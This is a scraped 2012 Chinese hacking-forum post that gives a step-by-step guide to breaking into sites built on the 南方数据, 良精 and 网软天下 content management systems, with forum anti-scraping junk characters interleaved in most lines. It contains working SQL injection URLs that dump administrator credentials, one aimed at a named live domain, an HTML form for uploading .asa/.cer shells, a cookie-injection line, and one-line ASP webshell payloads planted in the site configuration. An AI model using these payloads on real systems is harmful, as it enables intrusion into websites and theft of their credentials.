找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2295|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
5 \6 F: o* \5 r: h" V% J1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 & G! v" M. E5 L# C, q2 o
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7: a3 F' \3 d. B' \9 |
直接暴管理员帐号密码(md5)9 V, p+ |" {' s1 v- T$ G; z& e& ^
2.登陆后台( d1 ~! V: F$ {7 b$ J
3.利用编辑器上传:8 p) O. C+ ^0 V) k, h6 \3 F6 Y
访问admin/southidceditor/admin_style.asp
5 w+ x5 h0 k9 K修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.# `$ c  s3 W0 ^, U9 S% w
! M8 w3 T! I" d+ S; Y$ g
========================================6 Z1 L4 U; w: q; G/ O
$ B' L  ]2 c& v8 r
参考资料整理:  K. {0 V8 ]% B
南方数据、良精系统、网软天下漏洞利用
( S3 L0 u2 n# s, R. @) N  l9 h! f
7 a. g7 \& {6 P/ x# F1、通过upfile_other.asp漏洞文件直接取SHELL
, Z1 N- L' K5 o" s直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
7 X. S2 V8 T. _4 l% }' L<HTML><HEAD>
4 m+ ]1 C) x% @; ^<META http-equiv=Content-Type content="text/html; charset=gb2312">
0 c$ |' a/ K) W2 r! f: F<STYLE type=text/css>BODY { 4 C( ]4 A% q' z8 X8 M% [4 S7 k  d- K
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee ! o, _7 w6 M% c2 ]: }+ S
} , w+ c8 L  J: W4 R
.tx1 { ' y+ f8 k( p7 Y& ^+ F
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
2 P! ~5 X& }% L} 0 H; A& x, ?, J
</STYLE>
# q5 m' `" d1 l8 _7 X, L% S, a<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
. h) P( {. F& @, a) c1 x  o<BODY leftMargin=0 topMargin=0> ( m5 o* ], I0 k8 d( O
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
, h  R% \8 K3 b# KencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> 9 O) l1 h- _7 P6 E: B, A
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>% @5 f2 H3 `: z+ j7 t# n8 s

: n3 L" ]) l' `" ^9 J将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
5 f2 l! U( k" `" m注:此方法通杀南方数据、良精系统、网软天下等6 s) }2 q# l- e# c1 d+ c

# y  n# k7 x5 @- y  i2、通过注入秒杀管理员帐号密码,使用如下:
- |& Y! x6 L) `: _  yhttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
- `, v# s/ S. [- |4 F* o以上代码直接暴管理员帐号和密码,取SHELL方法如下:
% L% I0 w, N4 [( b$ o. R+ ?7 m在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’8 Z2 y7 w3 p! `1 K9 }7 i
成功把shell写入http://www.target.com/inc/config.asp6 D* X: i+ D' a& u/ n% w
这里一句话chr(32)密码是“#”
4 v; \2 k5 t6 A' U- d3、cookie注入$ H$ P' o& _( m2 i* \- `! d
清空地址栏,利用union语句来注入,提交:4 ?; |1 Z8 d8 E) V# F# {* t9 f2 }
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))4 @/ N1 d0 _: X" n0 N0 j
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?; o5 j0 _& f/ l  b* P  s% I8 a
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
0 W8 e# \0 d6 g9 \% u+ X(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
& Q5 k* r0 k2 L$ @2 O' f( `- @0 J& u& Q& n
三、后台取SHELL方法总结
$ [  O4 q; @5 T% H(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:# t- y, B+ E; [
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
  w6 v6 E% Q, G这时再打开一句话马的客户端,提交同样得到一个小马2 r2 c) j; i1 B: l
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
3 k, L% U. H3 ?7 k9 }(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
$ H6 |+ C% O/ T; Z- r! Gif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
. }3 l* @0 Q, f6 c$ G9 E$ N7 jEnableUpload=false0 m% ]/ D, `2 A, ^0 _" e2 K5 A

1 l3 P. y/ u' C% e8 hend if ; Q. `% X% C4 x# b$ z# t2 Q
if EnableUpload=false then9 s6 K' t9 |$ E4 R* x' U
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
- U( `7 m3 y  zFoundErr=true
: a( _9 X$ {, p: T, c* R$ Zend if
- ?1 o, o0 F1 N5 g' q1 J# W- d大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
6 D: H* J# j5 _7 d提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)2 _* b( a0 Z& R2 r
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
+ ]0 B8 u# s" V0 w3 C5 w* D/ w/ P; E6 W+ J
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的# f3 k; {( P5 H* T3 Y
直接访问备份后的地址,就得到一个webshell
0 S, h) N& M7 O4 h; R* R(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表